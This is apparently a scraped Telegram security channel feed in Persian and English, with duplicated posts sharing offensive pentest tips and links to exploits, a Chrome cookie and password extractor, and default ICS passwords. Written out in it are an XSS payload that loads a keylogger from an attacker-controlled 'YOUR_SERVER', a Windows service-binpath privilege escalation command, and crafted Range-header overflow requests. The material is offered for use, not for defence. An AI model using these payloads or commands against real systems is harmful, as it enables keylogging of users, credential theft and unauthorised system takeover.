آزمون آسیب پذیری SQL injection از نوع Time based با استفاده از امکان repeater در burpsuite
#burpsuite
#sqli
#pentest
@sec_nerd
#burpsuite
#sqli
#pentest
@sec_nerd
امنیت اطلاعات
Apache Solr RCE via Velocity Template Injection https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt #apache #rce #exploit @sec_nerd
آسیب پذیری RCE بر روی نسخه آخر Apache Solr یعنی نسخه 8.3.0 نیز کار میکند.
https://www.exploit-db.com/exploits/47572
#apache
#rce
#exploit
@sec_nerd
https://www.exploit-db.com/exploits/47572
#apache
#rce
#exploit
@sec_nerd
حرکت جدید مایکروسافت و ارائه ی Application Guard باعث شد که حتی با فعال شدن ماکروها هم نشه کاری از پیش برد و کسانی که با spear phishing اهداف خودشون رو آلوده میکردن کارشون سخت تر از قبل بشه!
#spear_phishing
#microsoft
#windows
@sec_nerd
#spear_phishing
#microsoft
#windows
@sec_nerd
بالا بردن سطح دسترسی در شبکه های ویندوزی
قسمت اول:
https://blog.compass-security.com/2019/07/privilege-escalation-in-windows-domains-1-3/
قسمت دوم:
https://blog.compass-security.com/2019/08/privilege-escalation-in-windows-domains-2-3/
قسمت سوم:
https://blog.compass-security.com/2019/08/privilege-escalation-in-windows-domains-3-3/
#privesc
#windows
#network
#AD
@sec_nerd
قسمت اول:
https://blog.compass-security.com/2019/07/privilege-escalation-in-windows-domains-1-3/
قسمت دوم:
https://blog.compass-security.com/2019/08/privilege-escalation-in-windows-domains-2-3/
قسمت سوم:
https://blog.compass-security.com/2019/08/privilege-escalation-in-windows-domains-3-3/
#privesc
#windows
#network
#AD
@sec_nerd
ابزار استخراج کوکی ها و پسوردها از مروگر کروم
نوشته شده با #C
https://github.com/rasta-mouse/CookieMonster
#chrome
#enum
@sec_nerd
نوشته شده با #C
https://github.com/rasta-mouse/CookieMonster
#chrome
#enum
@sec_nerd
GitHub
rasta-mouse/CookieMonster
Contribute to rasta-mouse/CookieMonster development by creating an account on GitHub.
👍1
مجموعه پسوردهای پیشفرض دستگاه های کنترل صنعتی
https://www.critifence.com/default-password-database/
#SCADA
#pentest
#network
@sec_nerd
https://www.critifence.com/default-password-database/
#SCADA
#pentest
#network
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
Manually Detect Remote Integer Overflow:
1. Note Content-Length. EX: 612
2. Take NO < Content-Length. Ex: 610
3. Add (610+612 = 1222)
4. Request Header - 'Range: bytes= -1222' => SAME RESPONSE
5. Subtract 9223372036854775808 - 1222 = 9223372036854774586
6. Request With Header - 'Range: bytes= -1222,-9223372036854774586' => BooM :)
#web
#pentest
@sec_nerd
1. Note Content-Length. EX: 612
2. Take NO < Content-Length. Ex: 610
3. Add (610+612 = 1222)
4. Request Header - 'Range: bytes= -1222' => SAME RESPONSE
5. Subtract 9223372036854775808 - 1222 = 9223372036854774586
6. Request With Header - 'Range: bytes= -1222,-9223372036854774586' => BooM :)
#web
#pentest
@sec_nerd
CVE-2019-1322
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
https://twitter.com/decoder_it/status/1193496591140818944?s=20
تست نشده!
#windows
#privesc
#pentest
@sec_nerd
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
https://twitter.com/decoder_it/status/1193496591140818944?s=20
تست نشده!
#windows
#privesc
#pentest
@sec_nerd
Twitter
ap
CVE-2019-1322 as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
کشف باگ در میکروتیک
https://github.com/tenable/routeros/blob/master/slides/bug_hunting_in_routeros_derbycon_2018.pdf
تعدادی از اکسپلویت های مربوط به میکروتیک؛
https://github.com/tenable/routeros/tree/master/poc
یک رایت آپ در خصوص نفوذ به میکروتیک و ایجاد سطح دسترسی روت:
https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21
#mikrotik
#routeros
#network
#pentest
@sec_nerd
https://github.com/tenable/routeros/blob/master/slides/bug_hunting_in_routeros_derbycon_2018.pdf
تعدادی از اکسپلویت های مربوط به میکروتیک؛
https://github.com/tenable/routeros/tree/master/poc
یک رایت آپ در خصوص نفوذ به میکروتیک و ایجاد سطح دسترسی روت:
https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21
#mikrotik
#routeros
#network
#pentest
@sec_nerd
GitHub
routeros/slides/bug_hunting_in_routeros_derbycon_2018.pdf at master · tenable/routeros
RouterOS Security Research Tooling and Proof of Concepts - tenable/routeros
رایت آپ کشف باگ LFD و دریافت ۱۷ هزار دلار جایزه
https://samcurry.net/reading-asp-secrets-for-17000/
#writeup
#lfd
#web
#pentest
@sec_nerd
https://samcurry.net/reading-asp-secrets-for-17000/
#writeup
#lfd
#web
#pentest
@sec_nerd
samcurry.net
Reading ASP secrets for $17,000
One of the more common vulnerabilities on ASP.NET applications is local file disclosure. If you've never developed or worked with this technology, exploiting LFD can be confusing and often unfruitful. In the following write up I describe approaching an application…
امنیت اطلاعات pinned «گروه امنیت اطلاعات https://t.iss.one/joinchat/Cu-7qUvIA5ULBMsmH9yVzA @sec_nerd»
Forwarded from امنیت اطلاعات
This media is not supported in your browser
VIEW IN TELEGRAM
Remote XSS Keylogger:
Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>
This will log a user's input to your remote server.
keylogger.php: https://pastebin.com/hzzQqSFt
keylogger.js: https://pastebin.com/ySyG4TiN
#BugBounty
#web
#pentest
#XSS
@sec_nerd
Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>
This will log a user's input to your remote server.
keylogger.php: https://pastebin.com/hzzQqSFt
keylogger.js: https://pastebin.com/ySyG4TiN
#BugBounty
#web
#pentest
#XSS
@sec_nerd